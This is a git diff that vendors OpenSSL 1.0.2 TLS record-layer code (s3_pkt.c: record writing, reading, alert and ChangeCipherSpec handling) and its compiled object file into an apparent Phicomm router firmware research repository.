+        if (!ssl3_setup_write_buffer(s))
+            return -1;
+
+    if (len == 0 && !create_empty_fragment)
+        return 0;
+
+    wr = &(s->s3->wrec);
+    sess = s->session;
+
+    if ((sess == NULL) ||
+        (s->enc_write_ctx == NULL) ||
+        (EVP_MD_CTX_md(s->write_hash) == NULL)) {
+#if 1
+        clear = s->enc_write_ctx ? 0 : 1; /* must be AEAD cipher */
+#else
+        clear = 1;
+#endif
+        mac_size = 0;
+    } else {
+        mac_size = EVP_MD_CTX_size(s->write_hash);
+        if (mac_size < 0)
+            goto err;
+    }
+
+    /*
+     * 'create_empty_fragment' is true only when this function calls itself
+     */
+    if (!clear && !create_empty_fragment && !s->s3->empty_fragment_done) {
+        /*
+         * countermeasure against known-IV weakness in CBC ciphersuites (see
+         * http://www.openssl.org/~bodo/tls-cbc.txt)
+         */
+
+        if (s->s3->need_empty_fragments && type == SSL3_RT_APPLICATION_DATA) {
+            /*
+             * recursive function call with 'create_empty_fragment' set; this
+             * prepares and buffers the data for an empty fragment (these
+             * 'prefix_len' bytes are sent out later together with the actual
+             * payload)
+             */
+            prefix_len = do_ssl3_write(s, type, buf, 0, 1);
+            if (prefix_len <= 0)
+                goto err;
+
+            if (prefix_len >
+                (SSL3_RT_HEADER_LENGTH + SSL3_RT_SEND_MAX_ENCRYPTED_OVERHEAD))
+            {
+                /* insufficient space */
+                SSLerr(SSL_F_DO_SSL3_WRITE, ERR_R_INTERNAL_ERROR);
+                goto err;
+            }
+        }
+
+        s->s3->empty_fragment_done = 1;
+    }
+
+    if (create_empty_fragment) {
+#if defined(SSL3_ALIGN_PAYLOAD) && SSL3_ALIGN_PAYLOAD!=0
+        /*
+         * extra fragment would be couple of cipher blocks, which would be
+         * multiple of SSL3_ALIGN_PAYLOAD, so if we want to align the real
+         * payload, then we can just pretent we simply have two headers.
+         */
+        align = (long)wb->buf + 2 * SSL3_RT_HEADER_LENGTH;
+        align = (-align) & (SSL3_ALIGN_PAYLOAD - 1);
+#endif
+        p = wb->buf + align;
+        wb->offset = align;
+    } else if (prefix_len) {
+        p = wb->buf + wb->offset + prefix_len;
+    } else {
+#if defined(SSL3_ALIGN_PAYLOAD) && SSL3_ALIGN_PAYLOAD!=0
+        align = (long)wb->buf + SSL3_RT_HEADER_LENGTH;
+        align = (-align) & (SSL3_ALIGN_PAYLOAD - 1);
+#endif
+        p = wb->buf + align;
+        wb->offset = align;
+    }
+
+    /* write the header */
+
+    *(p++) = type & 0xff;
+    wr->type = type;
+
+    *(p++) = (s->version >> 8);
+    /*
+     * Some servers hang if iniatial client hello is larger than 256 bytes
+     * and record version number > TLS 1.0
+     */
+    if (s->state == SSL3_ST_CW_CLNT_HELLO_B
+        && !s->renegotiate && TLS1_get_version(s) > TLS1_VERSION)
+        *(p++) = 0x1;
+    else
+        *(p++) = s->version & 0xff;
+
+    /* field where we are to write out packet length */
+    plen = p;
+    p += 2;
+    /* Explicit IV length, block ciphers appropriate version flag */
+    if (s->enc_write_ctx && SSL_USE_EXPLICIT_IV(s)) {
+        int mode = EVP_CIPHER_CTX_mode(s->enc_write_ctx);
+        if (mode == EVP_CIPH_CBC_MODE) {
+            eivlen = EVP_CIPHER_CTX_iv_length(s->enc_write_ctx);
+            if (eivlen <= 1)
+                eivlen = 0;
+        }
+        /* Need explicit part of IV for GCM mode */
+        else if (mode == EVP_CIPH_GCM_MODE)
+            eivlen = EVP_GCM_TLS_EXPLICIT_IV_LEN;
+        else
+            eivlen = 0;
+    } else
+        eivlen = 0;
+
+    /* lets setup the record stuff. */
+    wr->data = p + eivlen;
+    wr->length = (int)len;
+    wr->input = (unsigned char *)buf;
+
+    /*
+     * we now 'read' from wr->input, wr->length bytes into wr->data
+     */
+
+    /* first we compress */
+    if (s->compress != NULL) {
+        if (!ssl3_do_compress(s)) {
+            SSLerr(SSL_F_DO_SSL3_WRITE, SSL_R_COMPRESSION_FAILURE);
+            goto err;
+        }
+    } else {
+        memcpy(wr->data, wr->input, wr->length);
+        wr->input = wr->data;
+    }
+
+    /*
+     * we should still have the output to wr->data and the input from
+     * wr->input.  Length should be wr->length. wr->data still points in the
+     * wb->buf
+     */
+
+    if (mac_size != 0) {
+        if (s->method->ssl3_enc->mac(s, &(p[wr->length + eivlen]), 1) < 0)
+            goto err;
+        wr->length += mac_size;
+    }
+
+    wr->input = p;
+    wr->data = p;
+
+    if (eivlen) {
+        /*
+         * if (RAND_pseudo_bytes(p, eivlen) <= 0) goto err;
+         */
+        wr->length += eivlen;
+    }
+
+    if (s->method->ssl3_enc->enc(s, 1) < 1)
+        goto err;
+
+    /* record length after mac and block padding */
+    s2n(wr->length, plen);
+
+    if (s->msg_callback)
+        s->msg_callback(1, 0, SSL3_RT_HEADER, plen - 5, 5, s,
+                        s->msg_callback_arg);
+
+    /*
+     * we should now have wr->data pointing to the encrypted data, which is
+     * wr->length long
+     */
+    wr->type = type;            /* not needed but helps for debugging */
+    wr->length += SSL3_RT_HEADER_LENGTH;
+
+    if (create_empty_fragment) {
+        /*
+         * we are in a recursive call; just return the length, don't write
+         * out anything here
+         */
+        return wr->length;
+    }
+
+    /* now let's set up wb */
+    wb->left = prefix_len + wr->length;
+
+    /*
+     * memorize arguments so that ssl3_write_pending can detect bad write
+     * retries later
+     */
+    s->s3->wpend_tot = len;
+    s->s3->wpend_buf = buf;
+    s->s3->wpend_type = type;
+    s->s3->wpend_ret = len;
+
+    /* we now just need to write the buffer */
+    return ssl3_write_pending(s, type, buf, len);
+ err:
+    return -1;
+}
+
+/* if s->s3->wbuf.left != 0, we need to call this */
+int ssl3_write_pending(SSL *s, int type, const unsigned char *buf,
+                       unsigned int len)
+{
+    int i;
+    SSL3_BUFFER *wb = &(s->s3->wbuf);
+
+/* XXXX */
+    if ((s->s3->wpend_tot > (int)len)
+        || ((s->s3->wpend_buf != buf) &&
+            !(s->mode & SSL_MODE_ACCEPT_MOVING_WRITE_BUFFER))
+        || (s->s3->wpend_type != type)) {
+        SSLerr(SSL_F_SSL3_WRITE_PENDING, SSL_R_BAD_WRITE_RETRY);
+        return (-1);
+    }
+
+    for (;;) {
+        clear_sys_error();
+        if (s->wbio != NULL) {
+            s->rwstate = SSL_WRITING;
+            i = BIO_write(s->wbio,
+                          (char *)&(wb->buf[wb->offset]),
+                          (unsigned int)wb->left);
+        } else {
+            SSLerr(SSL_F_SSL3_WRITE_PENDING, SSL_R_BIO_NOT_SET);
+            i = -1;
+        }
+        if (i == wb->left) {
+            wb->left = 0;
+            wb->offset += i;
+            s->rwstate = SSL_NOTHING;
+            return (s->s3->wpend_ret);
+        } else if (i <= 0) {
+            if (s->version == DTLS1_VERSION || s->version == DTLS1_BAD_VER) {
+                /*
+                 * For DTLS, just drop it. That's kind of the whole point in
+                 * using a datagram service
+                 */
+                wb->left = 0;
+            }
+            return (i);
+        }
+        wb->offset += i;
+        wb->left -= i;
+    }
+}
+
+/*-
+ * Return up to 'len' payload bytes received in 'type' records.
+ * 'type' is one of the following:
+ *
+ *   -  SSL3_RT_HANDSHAKE (when ssl3_get_message calls us)
+ *   -  SSL3_RT_APPLICATION_DATA (when ssl3_read calls us)
+ *   -  0 (during a shutdown, no data has to be returned)
+ *
+ * If we don't have stored data to work from, read a SSL/TLS record first
+ * (possibly multiple records if we still don't have anything to return).
+ *
+ * This function must handle any surprises the peer may have for us, such as
+ * Alert records (e.g. close_notify), ChangeCipherSpec records (not really
+ * a surprise, but handled as if it were), or renegotiation requests.
+ * Also if record payloads contain fragments too small to process, we store
+ * them until there is enough for the respective protocol (the record protocol
+ * may use arbitrary fragmentation and even interleaving):
+ *     Change cipher spec protocol
+ *             just 1 byte needed, no need for keeping anything stored
+ *     Alert protocol
+ *             2 bytes needed (AlertLevel, AlertDescription)
+ *     Handshake protocol
+ *             4 bytes needed (HandshakeType, uint24 length) -- we just have
+ *             to detect unexpected Client Hello and Hello Request messages
+ *             here, anything else is handled by higher layers
+ *     Application data protocol
+ *             none of our business
+ */
+int ssl3_read_bytes(SSL *s, int type, unsigned char *buf, int len, int peek)
+{
+    int al, i, j, ret;
+    unsigned int n;
+    SSL3_RECORD *rr;
+    void (*cb) (const SSL *ssl, int type2, int val) = NULL;
+
+    if (s->s3->rbuf.buf == NULL) /* Not initialized yet */
+        if (!ssl3_setup_read_buffer(s))
+            return (-1);
+
+    if ((type && (type != SSL3_RT_APPLICATION_DATA)
+         && (type != SSL3_RT_HANDSHAKE)) || (peek
+                                             && (type !=
+                                                 SSL3_RT_APPLICATION_DATA))) {
+        SSLerr(SSL_F_SSL3_READ_BYTES, ERR_R_INTERNAL_ERROR);
+        return -1;
+    }
+
+    if ((type == SSL3_RT_HANDSHAKE) && (s->s3->handshake_fragment_len > 0))
+        /* (partially) satisfy request from storage */
+    {
+        unsigned char *src = s->s3->handshake_fragment;
+        unsigned char *dst = buf;
+        unsigned int k;
+
+        /* peek == 0 */
+        n = 0;
+        while ((len > 0) && (s->s3->handshake_fragment_len > 0)) {
+            *dst++ = *src++;
+            len--;
+            s->s3->handshake_fragment_len--;
+            n++;
+        }
+        /* move any remaining fragment bytes: */
+        for (k = 0; k < s->s3->handshake_fragment_len; k++)
+            s->s3->handshake_fragment[k] = *src++;
+        return n;
+    }
+
+    /*
+     * Now s->s3->handshake_fragment_len == 0 if type == SSL3_RT_HANDSHAKE.
+     */
+
+    if (!s->in_handshake && SSL_in_init(s)) {
+        /* type == SSL3_RT_APPLICATION_DATA */
+        i = s->handshake_func(s);
+        if (i < 0)
+            return (i);
+        if (i == 0) {
+            SSLerr(SSL_F_SSL3_READ_BYTES, SSL_R_SSL_HANDSHAKE_FAILURE);
+            return (-1);
+        }
+    }
+ start:
+    s->rwstate = SSL_NOTHING;
+
+    /*-
+     * s->s3->rrec.type         - is the type of record
+     * s->s3->rrec.data,    - data
+     * s->s3->rrec.off,     - offset into 'data' for next read
+     * s->s3->rrec.length,  - number of bytes.
+     */
+    rr = &(s->s3->rrec);
+
+    /* get new packet if necessary */
+    if ((rr->length == 0) || (s->rstate == SSL_ST_READ_BODY)) {
+        ret = ssl3_get_record(s);
+        if (ret <= 0)
+            return (ret);
+    }
+
+    /* we now have a packet which can be read and processed */
+
+    if (s->s3->change_cipher_spec /* set when we receive ChangeCipherSpec,
+                                   * reset by ssl3_get_finished */
+        && (rr->type != SSL3_RT_HANDSHAKE)) {
+        al = SSL_AD_UNEXPECTED_MESSAGE;
+        SSLerr(SSL_F_SSL3_READ_BYTES, SSL_R_DATA_BETWEEN_CCS_AND_FINISHED);
+        goto f_err;
+    }
+
+    /*
+     * If the other end has shut down, throw anything we read away (even in
+     * 'peek' mode)
+     */
+    if (s->shutdown & SSL_RECEIVED_SHUTDOWN) {
+        rr->length = 0;
+        s->rwstate = SSL_NOTHING;
+        return (0);
+    }
+
+    if (type == rr->type) {     /* SSL3_RT_APPLICATION_DATA or
+                                 * SSL3_RT_HANDSHAKE */
+        /*
+         * make sure that we are not getting application data when we are
+         * doing a handshake for the first time
+         */
+        if (SSL_in_init(s) && (type == SSL3_RT_APPLICATION_DATA) &&
+            (s->enc_read_ctx == NULL)) {
+            al = SSL_AD_UNEXPECTED_MESSAGE;
+            SSLerr(SSL_F_SSL3_READ_BYTES, SSL_R_APP_DATA_IN_HANDSHAKE);
+            goto f_err;
+        }
+
+        if (len <= 0)
+            return (len);
+
+        if ((unsigned int)len > rr->length)
+            n = rr->length;
+        else
+            n = (unsigned int)len;
+
+        memcpy(buf, &(rr->data[rr->off]), n);
+        if (!peek) {
+            rr->length -= n;
+            rr->off += n;
+            if (rr->length == 0) {
+                s->rstate = SSL_ST_READ_HEADER;
+                rr->off = 0;
+                if (s->mode & SSL_MODE_RELEASE_BUFFERS
+                    && s->s3->rbuf.left == 0)
+                    ssl3_release_read_buffer(s);
+            }
+        }
+        return (n);
+    }
+
+    /*
+     * If we get here, then type != rr->type; if we have a handshake message,
+     * then it was unexpected (Hello Request or Client Hello).
+     */
+
+    /*
+     * In case of record types for which we have 'fragment' storage, fill
+     * that so that we can process the data at a fixed place.
+     */
+    {
+        unsigned int dest_maxlen = 0;
+        unsigned char *dest = NULL;
+        unsigned int *dest_len = NULL;
+
+        if (rr->type == SSL3_RT_HANDSHAKE) {
+            dest_maxlen = sizeof s->s3->handshake_fragment;
+            dest = s->s3->handshake_fragment;
+            dest_len = &s->s3->handshake_fragment_len;
+        } else if (rr->type == SSL3_RT_ALERT) {
+            dest_maxlen = sizeof s->s3->alert_fragment;
+            dest = s->s3->alert_fragment;
+            dest_len = &s->s3->alert_fragment_len;
+        }
+#ifndef OPENSSL_NO_HEARTBEATS
+        else if (rr->type == TLS1_RT_HEARTBEAT) {
+            tls1_process_heartbeat(s);
+
+            /* Exit and notify application to read again */
+            rr->length = 0;
+            s->rwstate = SSL_READING;
+            BIO_clear_retry_flags(SSL_get_rbio(s));
+            BIO_set_retry_read(SSL_get_rbio(s));
+            return (-1);
+        }
+#endif
+
+        if (dest_maxlen > 0) {
+            n = dest_maxlen - *dest_len; /* available space in 'dest' */
+            if (rr->length < n)
+                n = rr->length; /* available bytes */
+
+            /* now move 'n' bytes: */
+            while (n-- > 0) {
+                dest[(*dest_len)++] = rr->data[rr->off++];
+                rr->length--;
+            }
+
+            if (*dest_len < dest_maxlen)
+                goto start;     /* fragment was too small */
+        }
+    }
+
+    /*-
+     * s->s3->handshake_fragment_len == 4  iff  rr->type == SSL3_RT_HANDSHAKE;
+     * s->s3->alert_fragment_len == 2      iff  rr->type == SSL3_RT_ALERT.
+     * (Possibly rr is 'empty' now, i.e. rr->length may be 0.)
+     */
+
+    /* If we are a client, check for an incoming 'Hello Request': */
+    if ((!s->server) &&
+        (s->s3->handshake_fragment_len >= 4) &&
+        (s->s3->handshake_fragment[0] == SSL3_MT_HELLO_REQUEST) &&
+        (s->session != NULL) && (s->session->cipher != NULL)) {
+        s->s3->handshake_fragment_len = 0;
+
+        if ((s->s3->handshake_fragment[1] != 0) ||
+            (s->s3->handshake_fragment[2] != 0) ||
+            (s->s3->handshake_fragment[3] != 0)) {
+            al = SSL_AD_DECODE_ERROR;
+            SSLerr(SSL_F_SSL3_READ_BYTES, SSL_R_BAD_HELLO_REQUEST);
+            goto f_err;
+        }
+
+        if (s->msg_callback)
+            s->msg_callback(0, s->version, SSL3_RT_HANDSHAKE,
+                            s->s3->handshake_fragment, 4, s,
+                            s->msg_callback_arg);
+
+        if (SSL_is_init_finished(s) &&
+            !(s->s3->flags & SSL3_FLAGS_NO_RENEGOTIATE_CIPHERS) &&
+            !s->s3->renegotiate) {
+            ssl3_renegotiate(s);
+            if (ssl3_renegotiate_check(s)) {
+                i = s->handshake_func(s);
+                if (i < 0)
+                    return (i);
+                if (i == 0) {
+                    SSLerr(SSL_F_SSL3_READ_BYTES,
+                           SSL_R_SSL_HANDSHAKE_FAILURE);
+                    return (-1);
+                }
+
+                if (!(s->mode & SSL_MODE_AUTO_RETRY)) {
+                    if (s->s3->rbuf.left == 0) { /* no read-ahead left? */
+                        BIO *bio;
+                        /*
+                         * In the case where we try to read application data,
+                         * but we trigger an SSL handshake, we return -1 with
+                         * the retry option set.  Otherwise renegotiation may
+                         * cause nasty problems in the blocking world
+                         */
+                        s->rwstate = SSL_READING;
+                        bio = SSL_get_rbio(s);
+                        BIO_clear_retry_flags(bio);
+                        BIO_set_retry_read(bio);
+                        return (-1);
+                    }
+                }
+            }
+        }
+        /*
+         * we either finished a handshake or ignored the request, now try
+         * again to obtain the (application) data we were asked for
+         */
+        goto start;
+    }
+    /*
+     * If we are a server and get a client hello when renegotiation isn't
+     * allowed send back a no renegotiation alert and carry on. WARNING:
+     * experimental code, needs reviewing (steve)
+     */
+    if (s->server &&
+        SSL_is_init_finished(s) &&
+        !s->s3->send_connection_binding &&
+        (s->version > SSL3_VERSION) &&
+        (s->s3->handshake_fragment_len >= 4) &&
+        (s->s3->handshake_fragment[0] == SSL3_MT_CLIENT_HELLO) &&
+        (s->session != NULL) && (s->session->cipher != NULL) &&
+        !(s->ctx->options & SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION)) {
+        /*
+         * s->s3->handshake_fragment_len = 0;
+         */
+        rr->length = 0;
+        ssl3_send_alert(s, SSL3_AL_WARNING, SSL_AD_NO_RENEGOTIATION);
+        goto start;
+    }
+    if (s->s3->alert_fragment_len >= 2) {
+        int alert_level = s->s3->alert_fragment[0];
+        int alert_descr = s->s3->alert_fragment[1];
+
+        s->s3->alert_fragment_len = 0;
+
+        if (s->msg_callback)
+            s->msg_callback(0, s->version, SSL3_RT_ALERT,
+                            s->s3->alert_fragment, 2, s, s->msg_callback_arg);
+
+        if (s->info_callback != NULL)
+            cb = s->info_callback;
+        else if (s->ctx->info_callback != NULL)
+            cb = s->ctx->info_callback;
+
+        if (cb != NULL) {
+            j = (alert_level << 8) | alert_descr;
+            cb(s, SSL_CB_READ_ALERT, j);
+        }
+
+        if (alert_level == 1) { /* warning */
+            s->s3->warn_alert = alert_descr;
+            if (alert_descr == SSL_AD_CLOSE_NOTIFY) {
+                s->shutdown |= SSL_RECEIVED_SHUTDOWN;
+                return (0);
+            }
+            /*
+             * This is a warning but we receive it if we requested
+             * renegotiation and the peer denied it. Terminate with a fatal
+             * alert because if application tried to renegotiatie it
+             * presumably had a good reason and expects it to succeed. In
+             * future we might have a renegotiation where we don't care if
+             * the peer refused it where we carry on.
+             */
+            else if (alert_descr == SSL_AD_NO_RENEGOTIATION) {
+                al = SSL_AD_HANDSHAKE_FAILURE;
+                SSLerr(SSL_F_SSL3_READ_BYTES, SSL_R_NO_RENEGOTIATION);
+                goto f_err;
+            }
+#ifdef SSL_AD_MISSING_SRP_USERNAME
+            else if (alert_descr == SSL_AD_MISSING_SRP_USERNAME)
+                return (0);
+#endif
+        } else if (alert_level == 2) { /* fatal */
+            char tmp[16];
+
+            s->rwstate = SSL_NOTHING;
+            s->s3->fatal_alert = alert_descr;
+            SSLerr(SSL_F_SSL3_READ_BYTES, SSL_AD_REASON_OFFSET + alert_descr);
+            BIO_snprintf(tmp, sizeof tmp, "%d", alert_descr);
+            ERR_add_error_data(2, "SSL alert number ", tmp);
+            s->shutdown |= SSL_RECEIVED_SHUTDOWN;
+            SSL_CTX_remove_session(s->ctx, s->session);
+            return (0);
+        } else {
+            al = SSL_AD_ILLEGAL_PARAMETER;
+            SSLerr(SSL_F_SSL3_READ_BYTES, SSL_R_UNKNOWN_ALERT_TYPE);
+            goto f_err;
+        }
+
+        goto start;
+    }
+
+    if (s->shutdown & SSL_SENT_SHUTDOWN) { /* but we have not received a
+                                            * shutdown */
+        s->rwstate = SSL_NOTHING;
+        rr->length = 0;
+        return (0);
+    }
+
+    if (rr->type == SSL3_RT_CHANGE_CIPHER_SPEC) {
+        /*
+         * 'Change Cipher Spec' is just a single byte, so we know exactly
+         * what the record payload has to look like
+         */
+        if ((rr->length != 1) || (rr->off != 0) ||
+            (rr->data[0] != SSL3_MT_CCS)) {
+            al = SSL_AD_ILLEGAL_PARAMETER;
+            SSLerr(SSL_F_SSL3_READ_BYTES, SSL_R_BAD_CHANGE_CIPHER_SPEC);
+            goto f_err;
+        }
+
+        /* Check we have a cipher to change to */
+        if (s->s3->tmp.new_cipher == NULL) {
+            al = SSL_AD_UNEXPECTED_MESSAGE;
+            SSLerr(SSL_F_SSL3_READ_BYTES, SSL_R_CCS_RECEIVED_EARLY);
+            goto f_err;
+        }
+
+        if (!(s->s3->flags & SSL3_FLAGS_CCS_OK)) {
+            al = SSL_AD_UNEXPECTED_MESSAGE;
+            SSLerr(SSL_F_SSL3_READ_BYTES, SSL_R_CCS_RECEIVED_EARLY);
+            goto f_err;
+        }
+
+        s->s3->flags &= ~SSL3_FLAGS_CCS_OK;
+
+        rr->length = 0;
+
+        if (s->msg_callback)
+            s->msg_callback(0, s->version, SSL3_RT_CHANGE_CIPHER_SPEC,
+                            rr->data, 1, s, s->msg_callback_arg);
+
+        s->s3->change_cipher_spec = 1;
+        if (!ssl3_do_change_cipher_spec(s))
+            goto err;
+        else
+            goto start;
+    }
+
+    /*
+     * Unexpected handshake message (Client Hello, or protocol violation)
+     */
+    if ((s->s3->handshake_fragment_len >= 4) && !s->in_handshake) {
+        if (((s->state & SSL_ST_MASK) == SSL_ST_OK) &&
+            !(s->s3->flags & SSL3_FLAGS_NO_RENEGOTIATE_CIPHERS)) {
+#if 0                           /* worked only because C operator preferences
+                                 * are not as expected (and because this is
+                                 * not really needed for clients except for
+                                 * detecting protocol violations): */
+            s->state = SSL_ST_BEFORE | (s->server)
+                ? SSL_ST_ACCEPT : SSL_ST_CONNECT;
+#else
+            s->state = s->server ? SSL_ST_ACCEPT : SSL_ST_CONNECT;
+#endif
+            s->renegotiate = 1;
+            s->new_session = 1;
+        }
+        i = s->handshake_func(s);
+        if (i < 0)
+            return (i);
+        if (i == 0) {
+            SSLerr(SSL_F_SSL3_READ_BYTES, SSL_R_SSL_HANDSHAKE_FAILURE);
+            return (-1);
+        }
+
+        if (!(s->mode & SSL_MODE_AUTO_RETRY)) {
+            if (s->s3->rbuf.left == 0) { /* no read-ahead left? */
+                BIO *bio;
+                /*
+                 * In the case where we try to read application data, but we
+                 * trigger an SSL handshake, we return -1 with the retry
+                 * option set.  Otherwise renegotiation may cause nasty
+                 * problems in the blocking world
+                 */
+                s->rwstate = SSL_READING;
+                bio = SSL_get_rbio(s);
+                BIO_clear_retry_flags(bio);
+                BIO_set_retry_read(bio);
+                return (-1);
+            }
+        }
+        goto start;
+    }
+
+    switch (rr->type) {
+    default:
+#ifndef OPENSSL_NO_TLS
+        /*
+         * TLS up to v1.1 just ignores unknown message types: TLS v1.2 give
+         * an unexpected message alert.
+         */
+        if (s->version >= TLS1_VERSION && s->version <= TLS1_1_VERSION) {
+            rr->length = 0;
+            goto start;
+        }
+#endif
+        al = SSL_AD_UNEXPECTED_MESSAGE;
+        SSLerr(SSL_F_SSL3_READ_BYTES, SSL_R_UNEXPECTED_RECORD);
+        goto f_err;
+    case SSL3_RT_CHANGE_CIPHER_SPEC:
+    case SSL3_RT_ALERT:
+    case SSL3_RT_HANDSHAKE:
+        /*
+         * we already handled all of these, with the possible exception of
+         * SSL3_RT_HANDSHAKE when s->in_handshake is set, but that should not
+         * happen when type != rr->type
+         */
+        al = SSL_AD_UNEXPECTED_MESSAGE;
+        SSLerr(SSL_F_SSL3_READ_BYTES, ERR_R_INTERNAL_ERROR);
+        goto f_err;
+    case SSL3_RT_APPLICATION_DATA:
+        /*
+         * At this point, we were expecting handshake data, but have
+         * application data.  If the library was running inside ssl3_read()
+         * (i.e. in_read_app_data is set) and it makes sense to read
+         * application data at this point (session renegotiation not yet
+         * started), we will indulge it.
+         */
+        if (s->s3->in_read_app_data &&
+            (s->s3->total_renegotiations != 0) &&
+            (((s->state & SSL_ST_CONNECT) &&
+              (s->state >= SSL3_ST_CW_CLNT_HELLO_A) &&
+              (s->state <= SSL3_ST_CR_SRVR_HELLO_A)
+             ) || ((s->state & SSL_ST_ACCEPT) &&
+                   (s->state <= SSL3_ST_SW_HELLO_REQ_A) &&
+                   (s->state >= SSL3_ST_SR_CLNT_HELLO_A)
+             )
+            )) {
+            s->s3->in_read_app_data = 2;
+            return (-1);
+        } else {
+            al = SSL_AD_UNEXPECTED_MESSAGE;
+            SSLerr(SSL_F_SSL3_READ_BYTES, SSL_R_UNEXPECTED_RECORD);
+            goto f_err;
+        }
+    }
+    /* not reached */
+
+ f_err:
+    ssl3_send_alert(s, SSL3_AL_FATAL, al);
+ err:
+    return (-1);
+}
+
+int ssl3_do_change_cipher_spec(SSL *s)
+{
+    int i;
+    const char *sender;
+    int slen;
+
+    if (s->state & SSL_ST_ACCEPT)
+        i = SSL3_CHANGE_CIPHER_SERVER_READ;
+    else
+        i = SSL3_CHANGE_CIPHER_CLIENT_READ;
+
+    if (s->s3->tmp.key_block == NULL) {
+        if (s->session == NULL || s->session->master_key_length == 0) {
+            /* might happen if dtls1_read_bytes() calls this */
+            SSLerr(SSL_F_SSL3_DO_CHANGE_CIPHER_SPEC,
+                   SSL_R_CCS_RECEIVED_EARLY);
+            return (0);
+        }
+
+        s->session->cipher = s->s3->tmp.new_cipher;
+        if (!s->method->ssl3_enc->setup_key_block(s))
+            return (0);
+    }
+
+    if (!s->method->ssl3_enc->change_cipher_state(s, i))
+        return (0);
+
+    /*
+     * we have to record the message digest at this point so we can get it
+     * before we read the finished message
+     */
+    if (s->state & SSL_ST_CONNECT) {
+        sender = s->method->ssl3_enc->server_finished_label;
+        slen = s->method->ssl3_enc->server_finished_label_len;
+    } else {
+        sender = s->method->ssl3_enc->client_finished_label;
+        slen = s->method->ssl3_enc->client_finished_label_len;
+    }
+
+    i = s->method->ssl3_enc->final_finish_mac(s,
+                                              sender, slen,
+                                              s->s3->tmp.peer_finish_md);
+    if (i == 0) {
+        SSLerr(SSL_F_SSL3_DO_CHANGE_CIPHER_SPEC, ERR_R_INTERNAL_ERROR);
+        return 0;
+    }
+    s->s3->tmp.peer_finish_md_len = i;
+
+    return (1);
+}
+
+int ssl3_send_alert(SSL *s, int level, int desc)
+{
+    /* Map tls/ssl alert value to correct one */
+    desc = s->method->ssl3_enc->alert_value(desc);
+    if (s->version == SSL3_VERSION && desc == SSL_AD_PROTOCOL_VERSION)
+        desc = SSL_AD_HANDSHAKE_FAILURE; /* SSL 3.0 does not have
+                                          * protocol_version alerts */
+    if (desc < 0)
+        return -1;
+    /* If a fatal one, remove from cache */
+    if ((level == 2) && (s->session != NULL))
+        SSL_CTX_remove_session(s->ctx, s->session);
+
+    s->s3->alert_dispatch = 1;
+    s->s3->send_alert[0] = level;
+    s->s3->send_alert[1] = desc;
+    if (s->s3->wbuf.left == 0)  /* data still being written out? */
+        return s->method->ssl_dispatch_alert(s);
+    /*
+     * else data is still being written out, we will get written some time in
+     * the future
+     */
+    return -1;
+}
+
+int ssl3_dispatch_alert(SSL *s)
+{
+    int i, j;
+    void (*cb) (const SSL *ssl, int type, int val) = NULL;
+
+    s->s3->alert_dispatch = 0;
+    i = do_ssl3_write(s, SSL3_RT_ALERT, &s->s3->send_alert[0], 2, 0);
+    if (i <= 0) {
+        s->s3->alert_dispatch = 1;
+    } else {
+        /*
+         * Alert sent to BIO.  If it is important, flush it now. If the
+         * message does not get sent due to non-blocking IO, we will not
+         * worry too much.
+         */
+        if (s->s3->send_alert[0] == SSL3_AL_FATAL)
+            (void)BIO_flush(s->wbio);
+
+        if (s->msg_callback)
+            s->msg_callback(1, s->version, SSL3_RT_ALERT, s->s3->send_alert,
+                            2, s, s->msg_callback_arg);
+
+        if (s->info_callback != NULL)
+            cb = s->info_callback;
+        else if (s->ctx->info_callback != NULL)
+            cb = s->ctx->info_callback;
+
+        if (cb != NULL) {
+            j = (s->s3->send_alert[0] << 8) | s->s3->send_alert[1];
+            cb(s, SSL_CB_WRITE_ALERT, j);
+        }
+    }
+    return (i);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_pkt.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_pkt.o
new file mode 100644
index 0000000000000000000000000000000000000000..b2fb319c416a07697a23d275661680638d2d20e6
GIT binary patch
literal 12568
zcmbtaeRx#WnZJ_>FhH0a6d_d55eH4I!~|$dDz&*}CfsQ!fDkN*I)=%FWF^Toxfii3
zWa7;Lx3>YbcBNk{+jUpk$8Nh-A*3aS4;fi)muj~~v6O8U8OJJAjVV@VfA6{HCMRRE
zf9#&;$=q{)=lweGdCz;^bD<*`uFiA0B&WHgTcqJP2bH8f^M?DCtXnC0r76<8@>Q3V
zuPC=EtCd>Cd~fwC)p)Deto0Wr2jrctd6E>iev$xv$o$y+Wym;mfq1n!A&d1wsnmzr
zY*w+ppAV&>lB{C9F(LV9tuPZkPlU;S{lC&aNJ*a7%4(8XZNBkg{?>V+=+k7R>iRfw
z%MAUh2CLe=?QDZF*s<v{HTqK6m1WF9^AJ&mqDl5}CrP)Gs*aQ7kXhXrvZ_6*m3R)X
z1C?=)c17~E?n(YxPCf;;<ms*Bl!{k7WW}nEn*o0Ty<DAfE9R?#l0OAq4e_AsUr4ZG
zGUL+^kS>cU30a#O!>&Qq%=fDm$F=J%u&dT$fA=)E8hw!&r&{^`fct)b0U6?0Y9$BB
z#7{GW0~KetToo+uFF(;60NVF0{5&%aKa4*;iBubXy8%c+^9}6^Yoos~aC5!CP?2li
zs(4mj_N-#27;V6OJ!JN)QL+LvDGXU#3zZZxN@2Vgsc`I#a7?iqNWi?LM&DK4n!m8*
z71h1a&qRbVg`#A?Vjk;Qm6>f@^%AIutx}8^Y`1fNC<EK}!o)(YncVEYgFL`oZB@pN
zv!02k^xClb0TZ72lIv*hT8yjsy}UewpIyrkASD^a^<&%FZ#nW^Epf6LI;6}*(w=b#
z%U@HCW5ogU?7BOZJCr+>yOhXLiqIaS%IPV!2v+OS1V$>X$3W0=y=s1>R($iP=xY-P
zwv+jJ+GQ0_?n6hP#7qsD$1<O@r{4j_zDMyhyeP(V+4RqVB>Ux^-FTK9aT!HmHorLw
zzpAyRNJ-`UF(8r4=cIzg2yMx-N25;?sp@{xgNN;xS+=GGh(4*wW~(@&KWHmatt1hq
z4AMo-N<4ucl+b%-wzXR7yp;VIbMtgwB46s0hH1%PNBKTB--m193bvKQ*5e7VtL8Mn
zV*J9-WSe2XCqRKCCm%$}5dIs|p-%~+OXf@ZoJ^r=E%jtqY)<xfoKJUwPBq_Q(}H)p
zUI7h-)Z~EQBX`x)sBx%_IK$S{2@)`)ydMx_NFi_mN%F(}nF<Hg{-D}9gpsJpe(hHy
